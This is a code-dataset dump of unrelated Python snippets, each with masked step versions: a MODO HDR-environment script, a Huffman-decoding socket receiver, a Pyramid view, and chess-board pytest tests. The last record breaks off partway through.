lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n # need a hack here to work round what appears to be a bug. We need to collect a\n # list of clips to delete after deleting the env items. For some reason we have\n # to collect the list in one loop, then delete the env items in a second loop\n # otherwise querying the env refl image returns None. I think this is because the\n # env image layer is originally an instance\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval('query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n # now delete the env items\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval('query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n \n # clear old ground and water material groups\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? %s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n \n # clear old clips\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr)\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n # rename the parent group\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? %s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n \n\ndef setframesize():\n try:\n backplate = None\n # find the backplate\n envchildren = lx.eval('query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n # set render frame size and film back aspect aspect\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n \n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int((clip_height/clip_width) * 1024)\n else:\n frame_height = 1024\n frame_width = int((clip_width/clip_height) * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n\ntry:\n # close previously open backdrop browser if there is one\n if lx.eval('query scriptsysservice userValue.isDefined ? HDRE_Card'):\n cookie = lx.eval('user.value HDRE_Card ?')\n lx.eval('layout.createOrClose {%s} open:0' % cookie)\n \n selectedItem = lx.eval1('query sceneservice selection ? locator')\n rootID = lx.eval('query sceneservice item.parent ? %s' % selectedItem)\n \n # check to see if an HDRE environment already exists and clear it out if it does.\n # this is a bit of a hack, we have to test to see if one of our known items exists\n # with an incremented name. If it does we delete all HDRE items with names that\n # are not incremented and then rename all the ones that are - YUK!!!!\n \n numcams = lx.eval('query sceneservice camera.N ? all')\n for x in xrange(numcams):\n camname = lx.eval('query sceneservice camera.name ? %s' % x)\n if camname in camnames.keys():\n incr = camnames[camname]\n clearold()\n renamenew(incr)\n break\n \n if itemexists('HDRECam'):\n # set animate camera focal length\n if itemexists('HDRECamAnimate'):\n flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3) * 1000\n if flength >= 101 and flength <= 200:\n flength = flength + 100\n elif flength >= 51 and flength <= 100:\n flength = flength + 50\n elif flength >= 18 and flength <= 50:\n flength = flength + 10\n lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' % flength)\n lx.eval('render.camera HDRECamAnimate')\n lockanimcamera()\n lx.eval('render.camera HDRECam')\n # group and lock the camera\n lockcamera()\n \n renID = lx.eval('query sceneservice polyRender.ID ? 0')\n lx.eval('item.channel globEnable true item:%s' % renID)\n lx.eval('item.channel dispRate 3 item:%s' % renID)\n lx.eval('item.channel dispRatio 8 item:%s' % renID)\n # set the scene gamma\n numouts = lx.eval('query sceneservice renderOutput.N ? all')\n for x in xrange(numouts):\n id = lx.eval('query sceneservice renderOutput.ID ? %s' % x)\n lx.eval('select.item %s set' % id)\n if lx.eval('shader.setEffect ?') == 'shade.color':\n lx.eval('item.channel gamma 2.2 item:%s' % id)\n \n num_envs = lx.eval('query sceneservice environment.N ? all')\n environments = []\n for x in xrange(num_envs):\n environments.append(lx.eval('query sceneservice environment.name ? %s' % x))\n for env in environments:\n if env not in HDREEnvs:\n lx.eval('item.channel visCam false item:{%s}' % env)\n lx.eval('item.channel visInd false item:{%s}' % env)\n lx.eval('item.channel visRefl false item:{%s}' % env)\n lx.eval('item.channel visRefr false item:{%s}' % env)\n \n numlights = lx.eval('query sceneservice light.N ? all')\n for x in xrange(numlights):\n if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':\n id = lx.eval('query sceneservice light.ID ? %s' % x)\n lx.eval('layer.setVisibility {%s} 0' % id)\n \n if itemexists('HDREActivate'):\n lx.eval('layer.setVisibility {HDREActivate} 0')\n \n controlsID = lx.eval('query sceneservice item.ID ? HDREControls')\n if controlsID:\n lx.eval('layer.setVisibility {%s} 1' % controlsID)\n \n # set render frame size\n setframesize()\n tagitems()\n \nexcept:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
import socket
END = bytearray()
END.append(255)
print(END[0])
def recvall(sock): # Odbiór danych
BUFF_SIZE = 4096 # 4 KiB
data = b''
while True: # odbieramy dane, pakiety 4KiB
part = sock.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
# 0 lub koniec danych
break
return data
def create_dict(data): # Odczytuje otrzymany słownik
dict = {}
i = 0
while True:
dict[chr(data[i])] = ''
j = 1
while data[i + j] != END[0]: # Dopóki nie znajdzie FF, uznaje bajty za 'kod' slowa
dict[chr(data[i])] += str(chr(data[i + j]))
j += 1
i += 1 + j
if data[i] == END[0] and data[i + 1] == END[0]: # Gdy znajdzie 3x FF, kończy słownik
break
return dict
def extract_start(data): # Poszukuje pącztka segmentu danych
i = 0
while True:
if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0]:
return i + 3
i += 1
def bytes_to_bits(data, begin): # Zamienia bajty na znakowy odpowiednik w bitach
bits = ''
for i in range(begin, len(data)):
bits += format(data[i], "08b")
return bits
def data_to_extract(data, dict): # Otrzymane dane na podstawie slownika odczytuje do tekstu
begin = extract_start(data) # Szukamy początku tekstu
print(begin)
data = bytes_to_bits(data, begin)
dict = {y: x for x, y in dict.items()} # Zamiana kluczy z wartością w słowniku
text = ''
temp_code = ''
for i in range(len(data)): # Dla kazdego bitu
temp_code += data[i]
if temp_code in dict: # Szukamy czy utworzona tymczasowo zmienna nie zawiera się
# w słowniku
text += dict[temp_code]
temp_code = ''
return text
def recieve_data(codedpath, decodedpath, ip, port):
port = int(port) #Segment odpowiedzialny za utworzenie połaczenia przy użyciu gniazda
sock = socket.socket()
sock.bind((ip, int(port)))
sock.listen()
conn, addr = sock.accept()
print('Połączono:', addr)
rec_data = recvall(conn) #Odbierz dane
rec_dict = create_dict(rec_data) #Utwórz słownik z danych
extracted = data_to_extract(rec_data, rec_dict) #Na podstawie słownika, odkoduj tekst
print("ODEBRANY SLOWNIK\n")
print(rec_dict)
print(extracted)
f = open(codedpath, "wb") #Zapis otrzymanych danych
f.write(rec_data)
f.close()
f = open(decodedpath, "w")
f.write(extracted)
f.close()
return 0
|
normal
|
{
"blob_id": "aa13278a4686e9bab7948c2f212f87f9bd6eee00",
"index": 969,
"step-1": "<mask token>\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\n<mask token>\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-2": "<mask token>\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\ndef create_dict(data):\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]:\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]:\n break\n return dict\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-3": "<mask token>\nEND = bytearray()\nEND.append(255)\nprint(END[0])\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\ndef create_dict(data):\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]:\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]:\n break\n return dict\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-4": "import socket\nEND = bytearray()\nEND.append(255)\nprint(END[0])\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\ndef create_dict(data):\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]:\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]:\n break\n return dict\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-5": "import socket\n\nEND = bytearray()\nEND.append(255)\nprint(END[0])\n\n\ndef recvall(sock): # Odbiór danych\n BUFF_SIZE = 4096 # 4 KiB\n data = b''\n while True: # odbieramy dane, pakiety 4KiB\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n # 0 lub koniec danych\n break\n return data\n\n\ndef create_dict(data): # Odczytuje otrzymany słownik\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]: # Dopóki nie znajdzie FF, uznaje bajty za 'kod' slowa\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]: # Gdy znajdzie 3x FF, kończy słownik\n break\n return dict\n\n\ndef extract_start(data): # Poszukuje pącztka segmentu danych\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin): # Zamienia bajty na znakowy odpowiednik w bitach\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], \"08b\")\n return bits\n\n\ndef data_to_extract(data, dict): # Otrzymane dane na podstawie slownika odczytuje do tekstu\n begin = extract_start(data) # Szukamy początku tekstu\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()} # Zamiana kluczy z wartością w słowniku\n text = ''\n temp_code = ''\n for i in range(len(data)): # Dla kazdego bitu\n temp_code += data[i]\n if temp_code in dict: # Szukamy czy utworzona tymczasowo zmienna nie zawiera się\n # w słowniku\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port) #Segment odpowiedzialny za utworzenie połaczenia przy użyciu gniazda\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn) #Odbierz dane\n rec_dict = create_dict(rec_data) #Utwórz słownik z danych\n extracted = data_to_extract(rec_data, rec_dict) #Na podstawie słownika, odkoduj tekst\n\n print(\"ODEBRANY SLOWNIK\\n\")\n print(rec_dict)\n print(extracted)\n\n f = open(codedpath, \"wb\") #Zapis otrzymanych danych\n f.write(rec_data)\n f.close()\n f = open(decodedpath, \"w\")\n f.write(extracted)\n f.close()\n return 0\n",
"step-ids": [
5,
6,
8,
9,
10
]
}
|
[
5,
6,
8,
9,
10
] |
from pyramid.view import view_config, view_defaults
from ecoreleve_server.core.base_view import CRUDCommonView
from .individual_resource import IndividualResource, IndividualsResource, IndividualLocationsResource
@view_defaults(context=IndividualResource)
class IndividualView(CRUDCommonView):
@view_config(name='equipment', request_method='GET', renderer='json',
permission='read')
def getEquipment(self):
return self.context.getEquipment()
|
normal
|
{
"blob_id": "a3cfd507e30cf232f351fbc66d347aaca99a0447",
"index": 4059,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@view_defaults(context=IndividualResource)\nclass IndividualView(CRUDCommonView):\n <mask token>\n",
"step-3": "<mask token>\n\n\n@view_defaults(context=IndividualResource)\nclass IndividualView(CRUDCommonView):\n\n @view_config(name='equipment', request_method='GET', renderer='json',\n permission='read')\n def getEquipment(self):\n return self.context.getEquipment()\n",
"step-4": "from pyramid.view import view_config, view_defaults\nfrom ecoreleve_server.core.base_view import CRUDCommonView\nfrom .individual_resource import IndividualResource, IndividualsResource, IndividualLocationsResource\n\n\n@view_defaults(context=IndividualResource)\nclass IndividualView(CRUDCommonView):\n\n @view_config(name='equipment', request_method='GET', renderer='json',\n permission='read')\n def getEquipment(self):\n return self.context.getEquipment()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
../pyline/pyline.py
|
normal
|
{
"blob_id": "3fe98c865632c75c0ba0e1357379590f072bf662",
"index": 7840,
"step-1": "../pyline/pyline.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pytest
from chess.board import Board, ImpossibleMove
from chess.pieces import King, Rook, Pawn, Knight
def test_board_has_32_pieces():
board = Board()
assert board.pieces_quantity() == 32
def test_board_can_be_instatiated_with_any_set_of_pieces():
board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})
assert board.pieces_quantity() == 2
def test_piece_cant_capture_an_ally():
board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})
with pytest.raises(ImpossibleMove):
board.move('f3', 'e5')
def test_alternating_between_players():
board = Board()
assert board.turn == 'white'
board.move('g2', 'g3') # white pawn moves
assert board.turn == 'black'
board.move('b7', 'b6') # black pawn moves
assert board.turn == 'white'
board.move('f1', 'g2') # white bishop moves
assert board.turn == 'black'
def test_only_white_pieces_can_start():
board = Board()
assert board.turn == 'white'
with pytest.raises(ImpossibleMove):
board.move('b7', 'b6')
def test_players_can_put_opponent_in_check():
board = Board({'e1': King('black'), 'f8': Rook('white')})
assert board.check is None
board.move('f8', 'e8')
assert board.check == 'black'
def test_players_can_get_out_of_check():
board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})
assert board.check is None
board.move('f8', 'e8')
assert board.check == 'black'
board.move('e1', 'f1')
assert board.check is None
def test_player_should_to_get_out_of_check():
board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})
assert board.check is None
board.move('f8', 'e8')
assert board.check == 'black'
with pytest.raises(ImpossibleMove):
board.move('e1', 'e2')
def test_pieces_can_capture_opponent_pieces():
board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'), 'f3': Knight('white')})
assert board.pieces_quantity() == 3
knight = board.get_piece('f3')
board.move('f3', 'e5')
assert board.get_piece('e5') is knight
assert board.pieces_quantity() == 2
|
normal
|
{
"blob_id": "5f471fb75b1c4f6fc7aa4cb4f99f9c1a1a9f0ea1",
"index": 8595,
"step-1": "<mask token>\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\n<mask token>\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-2": "<mask token>\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\n<mask token>\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-3": "<mask token>\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\ndef test_alternating_between_players():\n board = Board()\n assert board.turn == 'white'\n board.move('g2', 'g3')\n assert board.turn == 'black'\n board.move('b7', 'b6')\n assert board.turn == 'white'\n board.move('f1', 'g2')\n assert board.turn == 'black'\n\n\ndef test_only_white_pieces_can_start():\n board = Board()\n assert board.turn == 'white'\n with pytest.raises(ImpossibleMove):\n board.move('b7', 'b6')\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-4": "import pytest\nfrom chess.board import Board, ImpossibleMove\nfrom chess.pieces import King, Rook, Pawn, Knight\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\ndef test_alternating_between_players():\n board = Board()\n assert board.turn == 'white'\n board.move('g2', 'g3')\n assert board.turn == 'black'\n board.move('b7', 'b6')\n assert board.turn == 'white'\n board.move('f1', 'g2')\n assert board.turn == 'black'\n\n\ndef test_only_white_pieces_can_start():\n board = Board()\n assert board.turn == 'white'\n with pytest.raises(ImpossibleMove):\n board.move('b7', 'b6')\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-5": "import pytest\n\nfrom chess.board import Board, ImpossibleMove\nfrom chess.pieces import King, Rook, Pawn, Knight\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\ndef test_alternating_between_players():\n board = Board()\n assert board.turn == 'white'\n board.move('g2', 'g3') # white pawn moves\n assert board.turn == 'black'\n board.move('b7', 'b6') # black pawn moves\n assert board.turn == 'white'\n board.move('f1', 'g2') # white bishop moves\n assert board.turn == 'black'\n\n\ndef test_only_white_pieces_can_start():\n board = Board()\n assert board.turn == 'white'\n with pytest.raises(ImpossibleMove):\n board.move('b7', 'b6')\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': 